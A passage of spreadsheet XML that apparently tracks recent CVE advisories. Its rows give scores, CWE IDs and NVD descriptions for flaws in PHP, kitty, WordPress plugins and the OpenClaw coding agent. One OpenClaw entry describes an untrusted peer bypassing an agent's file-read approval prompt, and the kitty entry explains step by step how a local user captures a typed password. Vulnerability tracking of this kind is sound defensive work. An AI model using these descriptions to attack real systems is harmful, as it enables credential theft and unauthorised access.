This issue affects ash: from 2.17.15 before 3.33.11.</t>
        </is>
      </c>
      <c r="T313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93477</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93682</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>5.8</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>security@php.net</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="inlineStr"/>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S314" s="5" t="inlineStr">
        <is>
          <t>When the HTTP stream wrapper follows a redirect and the response carries a Location header with an empty value, the redirect code reads one byte past the end of the heap buffer holding the location. The value of that out-of-bounds byte decides which redirect target is built, so a malicious server controls whether the client is sent to the host root or to the current directory.</t>
        </is>
      </c>
      <c r="T314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93682</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95835</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>5.6</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="inlineStr"/>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S315" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in the askpass escape code handler in kitty from 0.25.0 before 0.49.0 allows a local user other than the one running the terminal to obtain the text typed into a prompt that kitty itself displays, because handle_remote_askpass() in kitty/window.py opens the POSIX shared memory object named in the escape code, parses a prompt definition out of it, and writes the user's answer back into an object of that same name, without at any point checking that the object is owned by the user running kitty or that its permissions exclude other users. The equivalent consumer of the same SharedMemory class in the ssh kitten performs exactly that check; the askpass path did not. The handler is reached through a device control string processed from the byte stream of the window, so the attacker must also cause bytes of their choosing to be displayed by the victim's terminal. Where the POSIX shared memory namespace is shared between the two users, a second local user can create an object with permissions that allow the victim to read and write it, cause the victim's kitty to render a prompt of the attacker's choosing, including a masked password prompt, and read the typed secret back out of the object afterwards. The prompt text is additionally passed to the display without control character sanitisation, so it can overwrite the warning line kitty prints above it. The answer is written by reopening an object of that name when the user answers, rather than through the handle already held. This results in disclosure of a secret typed by the victim to a second local user, and does not require any privilege on the victim's account.</t>
        </is>
      </c>
      <c r="T315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95835</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100547</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="inlineStr"/>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S316" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is a coding agent distributed as the npm package `openclaw`. In affected versions (2026.7.1 through 2026.7.2), alternate but valid `file:` URL spellings supplied over the Agent Client Protocol (ACP) were treated as relative paths and were incorrectly classified as reads scoped to the session working directory. When an operator connected `openclaw acp client` to an untrusted or compromised ACP peer, that peer could request a read of a file outside the session working directory without the approval prompt normally required for that path, resulting in disclosure of local file contents. The demonstrated impact is limited to file confidentiality; mutating and command-capable tool classes are not affected. This issue is fixed in OpenClaw 2026.8.1.</t>
        </is>
      </c>
      <c r="T316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100547</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100569</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="inlineStr"/>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S317" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an npm-distributed application. In versions &gt;= 2026.4.25 and &lt; 2026.8.1, the workspace environment-variable filter did not block variables ending in `_ENDPOINT`, so an untrusted workspace `.env` file could set AZURE_SPEECH_ENDPOINT. Azure Speech preferred that value over the configured region, so when a synthesis or voice-list request was made, the attacker-selected endpoint received the operator's Azure Speech key in the request header, allowing the key to be reused against the operator's Azure Speech resource. Exploitation requires an operator to start OpenClaw in attacker-controlled workspace content with Azure Speech configured with a key and region and no trusted endpoint override set. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100569</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100581</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G318" s="5" t="inlineStr"/>
      <c r="H318" s="5" t="inlineStr"/>
      <c r="I318" s="5" t="inlineStr"/>
      <c r="J318" s="5" t="inlineStr"/>
      <c r="K318" s="5" t="inlineStr"/>
      <c r="L318" s="5" t="inlineStr"/>
      <c r="M318" s="5" t="inlineStr"/>
      <c r="N318" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O318" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P318" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q318" s="5" t="inlineStr"/>
      <c r="R318" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S318" s="5" t="inlineStr">
        <is>
          <t>OpenClaw for iOS before 2026.8.11 stores Gateway credentials as cleartext JSON in App Group UserDefaults instead of the device Keychain. Attackers with access to unencrypted device backups or extracted App Group containers can recover valid Gateway tokens and passwords to authenticate with operator authority.</t>
        </is>
      </c>
      <c r="T318" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100581</t>
        </is>
      </c>
    </row>
    <row r="319">
      <c r="A319" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B319" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C319" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12037</t>
        </is>
      </c>
      <c r="D319" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E319" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F319" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G319" s="5" t="inlineStr"/>
      <c r="H319" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I319" s="5" t="inlineStr"/>
      <c r="J319" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K319" s="5" t="inlineStr"/>
      <c r="L319" s="5" t="inlineStr"/>
      <c r="M319" s="5" t="inlineStr"/>
      <c r="N319" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O319" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P319" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q319" s="5" t="inlineStr"/>
      <c r="R319" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S319" s="5" t="inlineStr">
        <is>
          <t>The Asset CleanUp: Page Speed Booster plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.4.0.5 via the 'page_url' parameter. This makes it possible for authenticated attackers, with administrator-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. This vulnerability is only reachable when the plugin's dom_get_type setting has been configured to 'wp_remote_post' by an administrator.</t>
        </is>
      </c>
      <c r="T319" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12037</t>
        </is>
      </c>
    </row>
    <row r="320">
      <c r="A320" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B320" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C320" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97222</t>
        </is>
      </c>
      <c r="D320" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E320" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F320" s="5" t="inlineStr">
        <is>
          <t>patrick@puiterwijk.org</t>
        </is>
      </c>
      <c r="G320" s="5" t="inlineStr"/>
      <c r="H320" s="5" t="inlineStr"/>
      <c r="I320" s="5" t="inlineStr"/>
      <c r="J320" s="5" t="inlineStr"/>
      <c r="K320" s="5" t="inlineStr"/>
      <c r="L320" s="5" t="inlineStr"/>
      <c r="M320" s="5" t="inlineStr"/>
      <c r="N320" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O320" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P320" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q320" s="5" t="inlineStr"/>
      <c r="R320" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S320" s="5" t="inlineStr">
        <is>
          <t>A heap use-after-free flaw was found in Gnumeric. When a user opens a crafted Gnumeric workbook containing a malformed SheetObjectComponent element, the XML parser can dereference a freed sheet-object component, causing Gnumeric to crash.</t>
        </is>
      </c>
      <c r="T320" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97222</t>
        </is>
      </c>
    </row>
    <row r="321">
      <c r="A321" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B321" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C321" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97877</t>
        </is>
      </c>
      <c r="D321" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E321" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F321" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G321" s="5" t="inlineStr"/>
      <c r="H321" s="5" t="inlineStr"/>
      <c r="I321" s="5" t="inlineStr"/>
      <c r="J321" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K321" s="5" t="inlineStr"/>
      <c r="L321" s="5" t="inlineStr"/>
      <c r="M321" s="5" t="inlineStr"/>
      <c r="N321" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O321" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P321" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q321" s="5" t="inlineStr"/>
      <c r="R321" s="5" t="inlineStr">
        <is>
          <t>CWE-255, CWE-259</t>
        </is>
      </c>
      <c r="S321" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in zhistaredu StarTraining up to 3.8.1. This issue affects the function UserLoginService.createToken of the file application.yml of the component JWT Token Handler. This manipulation of the argument user_id/company_id causes use of hard-coded password. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T321" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97877</t>
        </is>
      </c>
    </row>
    <row r="322">
      <c r="A322" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B322" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C322" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97878</t>
        </is>
      </c>
      <c r="D322" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E322" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F322" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G322" s="5" t="inlineStr"/>
      <c r="H322" s="5" t="inlineStr"/>
      <c r="I322" s="5" t="inlineStr"/>
      <c r="J322" s="5" t="inlineStr"/>
      <c r="K322" s="5" t="inlineStr"/>
      <c r="L322" s="5" t="inlineStr"/>
      <c r="M322" s="5" t="inlineStr"/>
      <c r="N322" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O322" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P322" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q322" s="5" t="inlineStr"/>
      <c r="R322" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S322" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in zhistaredu StarTraining up to 3.8.1. Impacted is the function anonymous of the file /druid/index.html of the component Druid Console. Such manipulation leads to missing authentication. The attack may be performed from remote. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T322" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97878</t>
        </is>
      </c>
    </row>
    <row r="323">
      <c r="A323" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B323" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C323" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97879</t>
        </is>
      </c>
      <c r="D323" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E323" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F323" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G323" s="5" t="inlineStr"/>
      <c r="H323" s="5" t="inlineStr"/>
      <c r="I323" s="5" t="inlineStr"/>
      <c r="J323" s="5" t="inlineStr"/>
      <c r="K323" s="5" t="inlineStr"/>
      <c r="L323" s="5" t="inlineStr"/>
      <c r="M323" s="5" t="inlineStr"/>
      <c r="N323" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O323" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P323" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q323" s="5" t="inlineStr"/>
      <c r="R323" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S323" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in zhistaredu StarTraining up to 3.8.1. The affected element is an unknown function of the file SecurityConfig.java of the component api-docs Endpoint. Performing a manipulation results in missing authentication. It is possible to initiate the attack remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T323" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97879</t>
        </is>
      </c>
    </row>
    <row r="324">
      <c r="A324" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B324" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C324" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100303</t>
        </is>
      </c>
      <c r="D324" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E324" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G324" s="5" t="inlineStr"/>
      <c r="H324" s="5" t="inlineStr"/>
      <c r="I324" s="5" t="inlineStr"/>
      <c r="J324" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K324" s="5" t="inlineStr"/>
      <c r="L324" s="5" t="inlineStr"/>
      <c r="M324" s="5" t="inlineStr"/>
      <c r="N324" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O324" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P324" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q324" s="5" t="inlineStr"/>
      <c r="R324" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S324" s="5" t="inlineStr">
        <is>
          <t>TDuck survey form through 6.0 lacks authorization checks on FormThemeController write endpoints for global form themes and categories. Authenticated non-admin users can add, modify, or delete themes and theme categories affecting forms owned by other users.</t>
        </is>
      </c>
      <c r="T324" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100303</t>
        </is>
      </c>
    </row>
    <row r="325">
      <c r="A325" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B325" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C325" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100388</t>
        </is>
      </c>
      <c r="D325" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E325" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G325" s="5" t="inlineStr"/>
      <c r="H325" s="5" t="inlineStr"/>
      <c r="I325" s="5" t="inlineStr"/>
      <c r="J325" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K325" s="5" t="inlineStr"/>
      <c r="L325" s="5" t="inlineStr"/>
      <c r="M325" s="5" t="inlineStr"/>
      <c r="N325" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O325" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P325" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q325" s="5" t="inlineStr"/>
      <c r="R325" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S325" s="5" t="inlineStr">
        <is>
          <t>RustDesk versions before 1.5.0 fail to properly validate file transfer permissions on incoming file clipboard messages in the Cliprdr message handler on Linux and macOS. Authenticated remote peers with disabled file transfer permissions can place files onto the host clipboard and retrieve copied files and contents from the process-wide clipboard cache.</t>
        </is>
      </c>
      <c r="T325" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100388</t>
        </is>
      </c>
    </row>
    <row r="326">
      <c r="A326" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B326" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C326" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100524</t>
        </is>
      </c>
      <c r="D326" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E326" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G326" s="5" t="inlineStr"/>
      <c r="H326" s="5" t="inlineStr"/>
      <c r="I326" s="5" t="inlineStr"/>
      <c r="J326" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K326" s="5" t="inlineStr"/>
      <c r="L326" s="5" t="inlineStr"/>
      <c r="M326" s="5" t="inlineStr"/>
      <c r="N326" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O326" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P326" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q326" s="5" t="inlineStr"/>
      <c r="R326" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S326" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a cross-site request forgery vulnerability in the extensions manager that allows attackers to perform state-changing actions without anti-CSRF token validation. Attackers can craft links or embed images to force administrators to install, update, pause, or unpause extensions by tricking them into visiting a malicious page while authenticated.</t>
        </is>
      </c>
      <c r="T326" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100524</t>
        </is>
      </c>
    </row>
    <row r="327">
      <c r="A327" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B327" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C327" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100528</t>
        </is>
      </c>
      <c r="D327" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E327" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G327" s="5" t="inlineStr"/>
      <c r="H327" s="5" t="inlineStr"/>
      <c r="I327" s="5" t="inlineStr"/>
      <c r="J327" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K327" s="5" t="inlineStr"/>
      <c r="L327" s="5" t="inlineStr"/>
      <c r="M327" s="5" t="inlineStr"/>
      <c r="N327" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O327" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P327" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q327" s="5" t="inlineStr"/>
      <c r="R327" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S327" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 could send third-party provider credentials to the wrong endpoint. In affected versions, when a third-party provider uses an OpenAI-compatible API and the resolved model metadata lacks a concrete base URL, a pinned session that continues after a model configuration hot reload retains that provider's credential while the OpenAI SDK selects its own default endpoint. A resulting request could disclose the configured third-party provider credential to an unrelated provider endpoint and fail with a misleading authentication error. Operators who observed this condition should rotate the affected credential. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T327" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100528</t>
        </is>
      </c>
    </row>
    <row r="328">
      <c r="A328" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B328" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C328" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100549</t>
        </is>
      </c>
      <c r="D328" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E328" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G328" s="5" t="inlineStr"/>
      <c r="H328" s="5" t="inlineStr"/>
      <c r="I328" s="5" t="inlineStr"/>
      <c r="J328" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K328" s="5" t="inlineStr"/>
      <c r="L328" s="5" t="inlineStr"/>
      <c r="M328" s="5" t="inlineStr"/>
      <c r="N328" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O328" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P328" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q328" s="5" t="inlineStr"/>
      <c r="R328" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S328" s="5" t="inlineStr">
        <is>
          <t>OpenClaw versions before 2026.8.1 contain a path traversal vulnerability in QQBot voice attachment handling where filenames are decoded twice, allowing encoded traversal segments to reappear after sanitization. Attackers can supply crafted voice attachments that write files outside the intended staging directory to other process-writable locations.</t>
        </is>
      </c>
      <c r="T328" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100549</t>
        </is>
      </c>
    </row>
    <row r="329">
      <c r="A329" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B329" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C329" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100550</t>
        </is>
      </c>
